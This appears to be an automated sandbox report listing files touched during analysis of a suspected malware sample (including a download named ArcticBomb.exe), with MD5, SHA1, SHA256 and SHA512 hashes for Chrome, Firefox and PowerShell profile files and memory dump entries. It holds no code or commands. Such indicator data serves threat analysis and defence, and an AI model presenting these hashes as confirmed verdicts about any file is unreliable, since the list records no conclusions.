| SHA256 | 8cc3034d909171010b88303d825ef9a30f8ba17d477c2cb1f7bc4653bb148a8b |
| SHA512 | 7a8ca26b6e741e7b01c5796b62a86185658f57bedc27a6b05f143f5b289517af0c56eeca3ec96ae556f181fdf7fbd8683f14cfd47cfb72f0f65d1fcbefd5f94a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 3773ae17312500a37366f4ba1a55a6c9 |
| SHA1 | 9a06f5284d19c8e809b8381b0976c62da5f33a78 |
| SHA256 | 9b440d82b027e863c3604e5254fcc8c16b31810b2d5bceac54f23346f765d3fd |
| SHA512 | 535da6081f9509bc7e19ecb2d7f2129ff81d6c55228a8832608ae8b264176a7b7795d719913291c1a0394c79ed78a0b469667f61bf6929ac98efa2f350522fac |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f09eadad5fd7c0106d3f89b3b0a5c69a |
| SHA1 | 8c9868478c90f971ba4feaafd41ed823bd736f84 |
| SHA256 | 4d7e3a23e6572c479b29a31a7e7b9f83f83bbcc7ea5572820347f03a3b24d0ec |
| SHA512 | 3d240f947fbd9c26c4e1e007f9b89e35f148bc13a2a766882c543950c44a5ee319cb4061920854f7b3c72d0289acb9690561083eec7a0c0fdb1c74d665e0a1a8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\7694b7cc-df44-4cb9-86de-21e79d93895a.tmp
| MD5 | 359e5ff165c06e9b9f337e721d9fe75e |
| SHA1 | b915df054feb7b17ee43bed75821d1ea3178b8b9 |
| SHA256 | 65ea3c15b1f0d984ace85ada5289126fd4bacd7d558a943d17828ea29a44648c |
| SHA512 | b10c7b2494109ccd84122286fac010d7a22bc05e1711f427275b42b44538070eb4ea5ef5fae2a6da687b1f1ec2255eb3169b745989dc3ed5c1b2b0e133a08b21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2bd49b65c30e871f04e68784ddd7e53b |
| SHA1 | b58e34477395ff405d36b01bdde97daf303b6842 |
| SHA256 | 0048a5e46ab1e9f6e64b574ada74e144c63e74d165225332c2f18086b1936f51 |
| SHA512 | 86c37366ee8cf1d39173ff7813cedd7098df89612bbf6c26991b8547460e61c4f0dc34f36afafe0c5b24f1c93ea84b8ef77b1a87825cec86b0b67b0b497b44ea |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 5f79d78870a68fd62ee55bf0f251ad87 |
| SHA1 | 9aaa757c59cdc82bac4c0b6240ee882296b683a7 |
| SHA256 | 641d46939e3ef077f79891ca557b4bfbd85b3de7ede33392866e766032707ade |
| SHA512 | 43312b95213499da8822f9f95600a056a84965038d6510b94de85300e6431441d2c3fdf4449afa8fcd0764ffbc3f679c1e2609a0ccbe44704b282f36c4a52656 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 766199657b33c4043a3bdefcafa4ab1c |
| SHA1 | 88686e69b5fb5daeafaa89cdc7efdb42f6a18c4f |
| SHA256 | 58146339984dbaf129bb3a97cc669f3248258d1c551e8e4cf69597f375a923d2 |
| SHA512 | ee83224843625b89ca0f057b26124db5289056bacc7ca8d60f51c60b46450d95786240a2f1e041c7caf857963f9d00a668186da6194c30cfc1bb2c2b954350b3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6334b1bb44057dc914bd36896350ffea |
| SHA1 | c29e45f9eb8d51d97c8ec2a26f76ef80ff71201f |
| SHA256 | 014adc2c76c4dbf34955c3700fd22b20a18945f5b13656c57f5c76f97f480df5 |
| SHA512 | dbea330d86199f21944ccda3f32ee328df14c35d87182db80568d1edd1a6b519dc7ddc9730f68f0e225a5862550eba9026c850fd9a1b755171ea816e2a551e0f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b651236c3894a27e6179397c916f89ac |
| SHA1 | f4a4120647cee0b688783dc5c05d5828881710ac |
| SHA256 | 02d52b4694f8a4ce907f179560e1d9cae7db4dc30baaf617eb118e9b7b98f99d |
| SHA512 | 2e6cdbb0f77bcc7af049706957a0b702c60f0b0c95ff909363e4d33c51929fbb87a874b13f1c19c94e4b2844e9a579b157001c82dad6d55929e76a555c933a37 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 06f350e958307c13769cd73ef6546697 |
| SHA1 | c0b5bb48f88ef30248ee1ae98dc8d92e8d35c5c7 |
| SHA256 | c8078b3800329761d8f09d1395482e4475f338eae6576cf53a17662270a62ab9 |
| SHA512 | 42cdd6f8df39084d787f9191551293754e2feb59fdd96632aa0c709002bdd51850bd34fe37169fe53210239b0be5bce4db8eb12f21dd15cf3ddb9759610f781f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\2\CacheStorage\index.txt
| MD5 | a7a2f6dbe4e14a9267f786d0d5e06097 |
| SHA1 | 5513aebb0bda58551acacbfc338d903316851a7b |
| SHA256 | dd9045ea2f3beaf0282320db70fdf395854071bf212ad747e8765837ec390cbc |
| SHA512 | aa5d81e7ee3a646afec55aee5435dc84fe06d84d3e7e1c45c934f258292c0c4dc2f2853a13d2f2b37a98fe2f1dcc7639eacf51b09e7dcccb2e29c2cbd3ba1835 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\2\CacheStorage\index.txt~RFe5b6b59.TMP
| MD5 | 5ded2425d7715ce83c896176242467de |
| SHA1 | b23938205ced7672fd5644000da8543020bc3d8e |
| SHA256 | c62825fdcea9c44eb3042c3ee62255db0d65b64ae5aad7a3f33dbb0830e97ae3 |
| SHA512 | 91499961c17d658c7e26870084c2964f90edf3accdd03f445276c37570f5696262e87dc6ed896668310d693dd7b7b693cd68ff2d14cd8eaa7a8584059b45d1f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8cb50e8e5d840cb00ce77a13d68aa561 |
| SHA1 | 5209cd122499a417965b96164015db308c6971d9 |
| SHA256 | 00136b7ee4d5862a68f86cf65cc4baf1d5be9dc8166404a661af1f1d27221bae |
| SHA512 | 56029879613d46b0eede1e22dd2575645e171047b6904074cf19af46be27b81ef5209cba847537c946f778a9ed4dd4db146545198b269e600e131e2cfed010d7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8a61eb7bc6ec8a238cb893d6b1cd5b49 |
| SHA1 | 30c46624d23739f47a995f14533cb4d086753d52 |
| SHA256 | ce5125720bdf9f5297e71e42787c6616d653b8986c185b5f7a944a1bdedf91d9 |
| SHA512 | 559752b1ec150ebd7467986f3b20c24949fb3e1bbcc6a26b2c33fbd960ef9eb49652af5488235d50108860ffec9d81cc738f773b42efdf18adb96059555b8277 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 77d004274034ccf3b14dedf5de1cb41c |
| SHA1 | b8ed293d004d9321dbe66df08a2fe8ff7ae08494 |
| SHA256 | 50e2b06a4f1e5dcdf1a384c9a1859f6e04e6af19711959fbed58bb17d89c8849 |
| SHA512 | 164d1c74a35970c97cb4ebbbb8946aca271d2a651671af8e3b733f2cfcfaa9cae9bf9cd10ba0ebddb8b9190bfe5320feed73c29d12554964537204f91e03ba2f |
C:\Users\Admin\Downloads\ArcticBomb.exe
| MD5 | ea534626d73f9eb0e134de9885054892 |
| SHA1 | ab03e674b407aecf29c907b39717dec004843b13 |
| SHA256 | 322eb96fc33119d8ed21b45f1cd57670f74fb42fd8888275ca4879dce1c1511c |
| SHA512 | c8cda90323fd94387a566641ec48cb086540a400726032f3261151afe8a981730688a4dcd0983d9585355e22833a035ef627dbd1f643c4399f9ddce118a3a851 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f45ad5cb5f2b679d2399db2f1c9f775e |
| SHA1 | eba73954207b77dc66355080b62074410df9e658 |
| SHA256 | bcc6dd1e6dacbebd232986d9d6c8eaeb89897fbf9c71ae55bf66255ff893ddd3 |
| SHA512 | 660019adac469fb470cf93c3c61c1b64fb0b7bc735d4a1bbd1e5fa2ae8d646e24efd86d63ebd3cc6fa61e0e57a93b0587274f56c313c345910d9c7dfcd4318a8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ea2989979149f774e251d670f602569e |
| SHA1 | 1c96d9d87f8cc447390158c5e70aa2422703c551 |
| SHA256 | a0c3ad658bfdd6214bc93957cf7fa0a91b12a0617cae5b91d424520a6aa40524 |
| SHA512 | 1641d800ebf1e8fe0ff05a13d5dd16bad90ca59f65ca8c7c0127e92488be2882c14fa3dffc6c46fdd1a531f450fbe924227fc82f1c61aba02ac9dad78ef0026a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 831b2db1d506d7e15ac686da705659bb |
| SHA1 | 9e5769f81e4c289e603683b2607815e799661a24 |
| SHA256 | c047c489b1c799ac8ea6f1d8eb22cdc2d76c2ee4eb0e5fdda5f84715aeb30081 |
| SHA512 | 4e023b1c81f3b2b90d5afac30103e4b73daf288106b281abfee934ef75b738e1fcb7c5a946da1ff4e84dbf10656d40296af718dde25973d27187a3bd7ab0c607 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 57a83d9ac9a43f835ff66e6c701d9251 |
| SHA1 | aaeb5d1e2e7269b49fefaaefbd057b1af863092c |
| SHA256 | c7777b38fa5b76fdd438921cd87f05a51130b890c6cb4d503e1eebd132a3bb3c |
| SHA512 | f02144b53dc6f61c7ec24d85913a712775c1e15237b6662f5016f080c363deafed63bf88887cff363d69f8adafbddac70f05f73ef193d92acad1582bb062728d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 95729c16f1f297eab6e2f8e912147724 |
| SHA1 | c7caf102c5f889bc928bbda95de498291565374d |
| SHA256 | 4ace89b1efd8cbcbbf81da3f51b82f813e8a3f79883ee320be1d072dd8c969fc |
| SHA512 | 8d9ecb59f7151b92596e84ddc74fc11c08157649d5e03a4f71f95e449d29664f5fb6df201e9ce73f8186e687ba1075f698ebab90a659c1665a62ef43e39d3a6b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | 60d02896244348b0cdca6876d3f2202a |
| SHA1 | e0b26f303a241cecab316c1c77d93eed64107dd5 |
| SHA256 | 5b8311acf9d9b79df334884465e7009e3fa908508ee9e27fa1409ee88b79c9b9 |
| SHA512 | f40b459600ea3ee188905876a489df3f420508f4658970d63ded46d2525d62c55a08f65c3284002073d3f8f5ec5b338800497e1b48978173d98d701db38aa15a |
memory/1292-934-0x0000000000400000-0x0000000000454000-memory.dmp
memory/1292-936-0x0000000000400000-0x0000000000454000-memory.dmp
memory/3272-939-0x0000000000400000-0x0000000000454000-memory.dmp
memory/1628-941-0x0000000000400000-0x0000000000454000-memory.dmp
memory/2468-944-0x0000000000400000-0x0000000000454000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 236f38fa7916b74540b5fd8a918cbab0 |
| SHA1 | 17bb2e0f70781b9ed4e5d267b94e8188be03f952 |
| SHA256 | 09a7731b925c4eafb52180d61a30d74002882cfde314313c1a14219ccd70a489 |
| SHA512 | 3fc1641b41d2a80ace2b3e7089d7108c57262f1d1d525c16f3baab7955d698f4775ed44f3ba44beeeca19af23951c7865669b91fc2451d74bf4ebd2f963da2f4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 47308ed6c2f03f22ed5b9ea2253468be |
| SHA1 | 11499f765df66a59041199148bf63d642d592e45 |
| SHA256 | 9e60a7f37ccffae42d222b0a40b68103e0a3c73242aacf3c45f40c2181ffa6ff |
| SHA512 | b22065c78f1386411f7171328e4b3761912a1df5ed939ee54299bd329689aa3378760f4497d3b2e4ec15a736acbd342a97f662acde1aae3981fd9e1fa1877852 |
memory/3032-1001-0x0000026EEFAE0000-0x0000026EEFAEA000-memory.dmp
memory/3032-1002-0x0000026EF2560000-0x0000026EF259A000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | efc82f8314de2fb0909127cebb38a019 |
| SHA1 | ffeb52cdf0bffa888270847d4981cc96ba448c14 |
| SHA256 | 9836d53d4914279fb42e48acea940dc78d94b2ba4866e0731a528c65ff131d2a |
| SHA512 | 89d234d0dbecccda14e5fadb343a7b80a4ce464e270d1e17488b66bf707da13c0f0de30ce9f4a20746c5951c31fe776e9d618712fa6a842749555dd1cc2b0866 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f69d6a2106cb826394253f1ef46dbead |
| SHA1 | 94e55a484b4c28b5c5eafd828361da8d76294bec |
| SHA256 | 195a68386feced1523fa2f6025c1910850aa519ecc83ac2d8b29c462fa925beb |
| SHA512 | dd213742e0d2134dd9e0d86800abf83fc7da50b844b8cd5ff36b07d13fca7bc42cd332d55504d326b479d84d3db1239f3ef9b50349e4ad952c638f1b30180c8b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 51b09b6b473c9e9f9c46749274c8824d |
| SHA1 | c43c3463a7df4ad7baec1f187eff5d78dd53e147 |
| SHA256 | 9b333cee30118949141edb13bf9589c7233e56ad508d30abc159ae37ca1be8b1 |
| SHA512 | 15a86bc1918307dd56d4cd12c51c0257142b4bd4ee3d7b2d3c0460a7062929c899d96a8773e7ab4f408cac13fe09cbc5f3dad387da5ec648a7e3ffc982772609 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4b7db3e642ae2f83aac54d0c3569a4f5 |
| SHA1 | 21772ad68c5e22b0249c63cf98a2acfab795df83 |
| SHA256 | 525e604ccba88ac7461b3632753d815abad55ecbdbd1aff0c746f56bb41f13b8 |
| SHA512 | 689ef6062a5aca73eadcc3375a6d1aa0f1250bf6528ea3431842d5c05e487712ace7c932c482c979ce5575562ef47e5d359f1dc704dba47883113d9f89048e91 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | accb2b49633d018739fe9011954bff4f |
| SHA1 | 25610a83d06afa1ff52fbe55925f7fdce4ba2eb5 |
| SHA256 | 492238603a6b75a832431e88a2adc61a02c0036fca46cc08b557210f4bd82886 |
| SHA512 | 56c6d6af5a6d1ed00b92854300c20aefd2ae608226f1e031cbfb054223b6ba0a8bfeee6d5229dde3d48cedfe50880d93db06211baa40cf16c693b277dea64961 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 968c2bba39fe9b539362c47125afb58e |
| SHA1 | 91b26b637ccfacf1b497480889e679ceab402af5 |
| SHA256 | 16434b4afd05c5ef85762473dec4939348e1c5fb37df78477a7a37681506447a |
| SHA512 | 4a685567a3aec671cc873e83a2711026e14f61000a80264563ee97eaa13d772c6a8c68d32fdc19041888b4c2a05305366ed6ef120479d938e0fdc9b3da7c11b9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3942294df4f9fc4f67179c1ed0535996 |
| SHA1 | 270e14258d0b7e05902c50daeebed5aeba11a50e |
| SHA256 | 1e24b59c3121834fefdcf68d471462ec1ad688d7ba81c1296715859e3e05e010 |
| SHA512 | 496606da90b89b13f0c510cb4435dff20e08377f9dab843b78a9e776be1fe154496f783a495bb09f5f9b21f4ec02b61a9441b81d8dfb7dc6617b30c1bc5df89a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c232d00c8a5f1c9dd83898c80c9742f0 |
| SHA1 | 9b37f776ec7edcd9f427b636a604b59c5e2c4723 |
| SHA256 | e22fb19795cd53a31230d4196c60276f76ac904823c274269997f1c8401512c1 |
| SHA512 | 9748f96adc5036252d5ba10a3aedd0eba9c510bc4f380f0c15b58453a302389aea4881e9500870600ada873c6f493e5d7ff74763c865f22cce1d537cff4a69d4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 60d90ed7ca483327fd48cbd0680486b3 |
| SHA1 | 736192b5b73fc95e924f0bf78f502b8d9aa9a850 |
| SHA256 | 2f006970ba701c0e1f2dadf036a6120321d259e388a524986aa40bd540d5d1c5 |
| SHA512 | 0f8358a268d8827da7b2bfcbd4f8d74439cd9a369851c321fd7bb60c1db667edb1b0432fd51317368b9a674a831a5c7a0bc718d054a4e019ac9156f1fc54721e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0be0ac24042138d4b3e1d802250fa5c6 |
| SHA1 | c67afe0674d8ce1c3b6bff374d4ed067f7bdab47 |
| SHA256 | 402490c377b53db11bdb4304f4dbfcd61705528145604f77a10b399846c92a8c |
| SHA512 | c926b39a04763d1e8138be618fdf46e57442c9bcb4119d1eb47e8c092f3bf6df52cc7778fc3d8e170cea14f51e91c70221f2799633d5235658a7fd9e9a083fec |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 38baddbdc600146f3df75ea2dd1570f9 |
| SHA1 | dc8be15b9895142d64e008cb3e61d30e23d1b193 |
| SHA256 | 30fbb135d876350b9e7b71c5db9d5259277124b313cf7fc6e014f75f62f30213 |
| SHA512 | 0661d554f56defadfe23e8ab31a3edd77b7249816d01be489b3235b55d4eacdf5cc438191645a4113e70f24638b0bfd1041dd52e68b2aeea472ffbc2989b67a4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\2\CacheStorage\index.txt
| MD5 | 28a1b528c647e72b16e0f9a583cf1155 |
| SHA1 | 5e7993a5f3c072715b626df86e67a31fa9dca960 |
| SHA256 | c2bac112036f531a51e55819f41fa3e8f4f92f4d808d2ac5dab06ac7d7ca7142 |
| SHA512 | 27c75d7cf3e067a771d6aed6cfdef620ba7d53f55abf51c7e6f8985f6e63875bb1f8a1fbfec5aa4a2497d8d3d16413c8d2c063cc7c0fe032f70e5601e9ef4c94 |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4eaba604a8b62280e5c7f0de6c1fc0ed |
| SHA1 | 61bec65811c1135e63789817c450cff73a4d648e |
| SHA256 | 037f2bc10eb55820c6846d77864d7269125bfa419df451266127235a31d6ded5 |
| SHA512 | 5436c4d8ec570561340ae3b03502f3dad6a6494f1ca64501d3359152d2cd78e3530e5979895841eb3698ec7eaf4c802eeafd1f6488fed6c3d3102dc44e7ca476 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 5c0828624d7c3abcbcca44ea01d60669 |
| SHA1 | e465ae234fa693c11285921077823acc2802a12c |
| SHA256 | 3eeb7e91b2177c9db1f3c91e860431e89354b7b787f4a40c540cad03a40e0447 |
| SHA512 | dc11d89eb302896a9b599adeeb2763d4071b55546e8224e62584181e6a7344e167f3535fbc69fb2ead3e7b03cd0f467c8f295e74780b7af66e7690c1e8613e81 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d795d37cbf06e655728694afd71aede6 |
| SHA1 | a57a5d153b67573be7b354de4e1ec27f844d70ff |
| SHA256 | 90e5f2a849bc1d825dfb1e39ddd23c13e1406ce102507c12102240e938dc02a2 |
| SHA512 | 0a3abcdd034e18ba69c8e818a7858e98b622afcf709c4fd699de9fc87c6effacdd1997fd1ca2ab9d24074b5073559d313e5241f43264c6636a7a7bbdb0f936ef |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 4de7331e95826deb0d4826cd0b672b84 |
| SHA1 | 1cc028419972d06800f007f91119b45380cfeb70 |
| SHA256 | 960be77fbad6b2f72a7c262f562ed11390ab6b1d1a58d6693748e2eb09cffaa0 |
| SHA512 | 7504d56fbc25566a9795759cab38569d14fdac5a288847b3cfd205f40ef50a3dc799d791f859372c08c283415b3bad938794266e0330c49eb27cd6ce1d9d958a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f8ff8fee9efa4a5746a37a13f4d97e14 |
| SHA1 | fb6bc7e7a1a4909dc6baa78f94ec3331883728fa |
| SHA256 | 5a1b1b7fef6ca919951d1f3991dfb11256f052518de135eb3eee780c8b8c1163 |
| SHA512 | a33f80d26f63c4efb1c97c731165888cba649e5c7b8b246f35d1d60086f679777d4a4115901657f9066c2ea8d9ca721ab863cbb74bdf8e9f60348a5ad75bd051 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a875823f3a4404150447b831563783d4 |
| SHA1 | 2454d0c10a6824075247a49c0522f0c48758b7c0 |
| SHA256 | 5ae26b27c0d7217e119e332bb455423365cbc55a15f6ff4a451809f2878ecf42 |
| SHA512 | d2d4c2cf7218602e18f3fb23c5115ec174a99f19d86724fc15ef74dd89b4c462eb3baf736863216912035757f3030f12c214721f1983d5551f8dc5fff1adf371 |
C:\Users\Admin\Downloads\Mandela-Classic-main.zip.crdownload
| MD5 | 24df46ff24ad9664d57ae1f147af2cff |
| SHA1 | 7104783d3a63d0e89f6a0256c6f64e4be2c304bc |
| SHA256 | 7267a6ee66102c54cd725034975493ba08e32af89e5d7fbceacbcb70bdc68b4f |
| SHA512 | c7ae92d09ddc7e22d91819033e3f1c46f508a5fb7946416b5390664cacd50785afa0972243dd626fc4337c240e17444b3914d80bf04c126abfd0bbe95e7e4312 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 797a49fd57627ad02fbba6f53e9734ff |
| SHA1 | 39a3d3a79a276df5d34c18a799824856c5b3b33e |
| SHA256 | 7acaa998a25fdd103cdeeb76cea889b43a80e36ceb3370e3095ed5d655f01a76 |
| SHA512 | 16753e7321719c9b94eb480d3dd9880feee618a4a24fc624c1c4d887a30298fef49ceb3fc15d2146d4d5eb1367e4606740d1999c6123602d0248aa41ff6a48dd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6a68aa9f054d67006ce515f5f6becf29 |
| SHA1 | 7e3190d0f80ad2507682242bf441617fdefc2dc2 |
| SHA256 | de45ae6323d4066aadecd6d218f813d339357a55fcd0c56ea2b71459fedc47ea |
| SHA512 | 729470e6909be0f526e123709cd56a28a0d15df2e5ab20bf79ec3a09d4ef2b690049f3810da8f7f5d9922cad5deb69893737066c3264ea2edeb7897098338717 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 37e08566adef20c91cccf10c368f86f1 |
| SHA1 | 8458b29b65570924f59500949056c01784fd689a |
| SHA256 | 9818b8d358c987ba4594ab5759b69ce5b081f1d4f5bedbea20d9ace070048aa4 |
| SHA512 | a94371cddc11a6705267fd1fed94a8c8b264c026db63fed2b70376e5ef467bdd4f80baa4f291a4e8da05ed8fa8b1d139f9f52ed3c167644260408877c187ba4a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 416a4b0ca56a5063512e6d770aeb1c5d |
| SHA1 | 3fc6db56c3d245c221fa43c557666d28f96edaa9 |
| SHA256 | f20a9eaaa4fb20dd9ee5ab03a7155a5b41577e5ce9c8e35e5e4d55deebc00b2f |
| SHA512 | 214bc13ab36a6369ddc4aa1a70210ce5c045a14cfedab4c2557fa82459b60747c806cda0ca3ae7a2bc5230b1c1b17815579150907255667b4d6000d3572cd7d2 |
C:\Users\Admin\Downloads\a6VFNlFn.part
| MD5 | 98faf2a739ccd49e037eab232a766f01 |
| SHA1 | 676538d08e07c7acc6b11e485d13b35ef1457cf4 |
| SHA256 | 9d46e0feedf96e399edfca09872802ba21e729f79c01927ad25ea2b0a35bca23 |
| SHA512 | 23fe1f3f552d306c56245b33f2d96fd4fb0ebeeab1a1f87327b5e2c64c3d6dc8c222bf28b7ec8809f365559fa5fa6923f32761d25c6045953e8c8a6ca0137f7b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 9d4a8836200d160f16edb5927dc4ef10 |
| SHA1 | a63470e859d4a7660685191b531cc984104bc797 |
| SHA256 | 68e35941a7fe47c891f803c3426b26fd2bb5c91697ffa5212482ad0d7eb8037c |
| SHA512 | 63d15afd4c3d891514795eab02adc2bf9a1ae1d5ab3c9c0b4aeda297f06a05297963cc004e032e792b7daaf66f510e47331392cfe4e50945a31c45145bede6d7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\ff022c4b-2e64-4b7b-8ffc-275fda852f32
| MD5 | 0b32e45a51e5d2377259038e1febba66 |
| SHA1 | dc318cb239571d8bf8b14255864f601327115d74 |
| SHA256 | 1ba0e2784cf261f46c0930a23db0e5864e8e9dd6cf6e25c6d81a7e478159459d |
| SHA512 | 69ab6913ad552a363b403bd8a3b754e164929de87e1fe0182a225ef200c7b059b8a08d690c08b96814cd42ccf2badc844e174a948ba3b45d7077f0305236b8e7 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\a01ff83c-3acc-4dea-a03b-43ad80835f3a
| MD5 | c717f6df18e36062f25cf1c6098c85eb |
| SHA1 | f2eb2f3cd535c05bc7944973bb0ee8cb2072da93 |
| SHA256 | c9061ebffba33dab0a95d648fa133e3569eedaa0899b513e2be28d5724802822 |
| SHA512 | 23ca5b721a2eba4b3bc57cb39489d5b27a19583362100a3d07d121538496b432af52616d08c5c48101b33b1cd20f325d45f6f71b6b78ba9fd846f94838a6a5c9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\pending_pings\37de83f2-b9f5-4007-8296-49480d67416b
| MD5 | 8d39f58607b9fb774792dff1804a326f |
| SHA1 | 49a9d50d8145ecbbe04aeac99e548fdc55daaf7c |
| SHA256 | 04baaa3063551c801a4a4fba4c39a6f6e285887c8b87b3c51dc247d5a8010de5 |
| SHA512 | 86023a766709f7e5239a6c678b88a6fc8d20e70bf3b2aeb153b98e3842af210b9cecaf6a2b93076747bb96c300b4a3d658960084b479f5bce657c9ad3202fc99 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 7dcf7ac4fac95aafb3508c5db1c27264 |
| SHA1 | 64ead790d3c92762b3a8bb24c418be977a9d66ca |
| SHA256 | 0e40f86824cfab1658cebc410d7f08891037ef645a9d1a03c747fdc55abe8e8e |
| SHA512 | 6e7fa1fb21dfa5b35bb53f5c95b170cce7569f2099a63f29a405d19ce1902df49b90b45fcca4e9466c0f5e27f1fcd84e0c63677a13a5d2067b91413d35718356 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\prefs.js
| MD5 | dd880405f5755c7f00058af504999f74 |
| SHA1 | c773e1842fb71c0db4ceb2707e0f5aeaea3fbc56 |
| SHA256 | 60c307270512e3224e19dcf8a3a67e7c1f10c06bb715c58a8a12b88e1dad53fe |
| SHA512 | 10bccaf56618756349b2826dce354b7b353d56bcfc8764b49f043f45d7cedf0934c7bbd57166aa43c9f9742d27c847fd98b3bd1d5201f84a9e4c656bd186dd75 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\AlternateServices.bin
| MD5 | 2ec81ab696c4ad11aeaa24b9c04ec9e1 |
| SHA1 | 150cc81faccd3443fec1738ce88d67ee78e0e042 |
| SHA256 | 78517a61992d98b546d643b4f3383a88430989a3561a3d6e8176a1d20ea8235f |
| SHA512 | 63526472f4be793835455d46dd1ba194de1e74913adf00fd8ba9a69544fb67afe0adffb7488433e19f3f2980ddacb80598857489109ab77fe6bb908becb6655c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 6a5b557963c0ad8c1d36aa2e4929a60f |
| SHA1 | 64863a7be8614cdabdc5b625c942f0112a930d48 |
| SHA256 | 00ec984065f3f9a55c126f1efcd2ce11ababf4409bdae6882b2da34601e42cac |
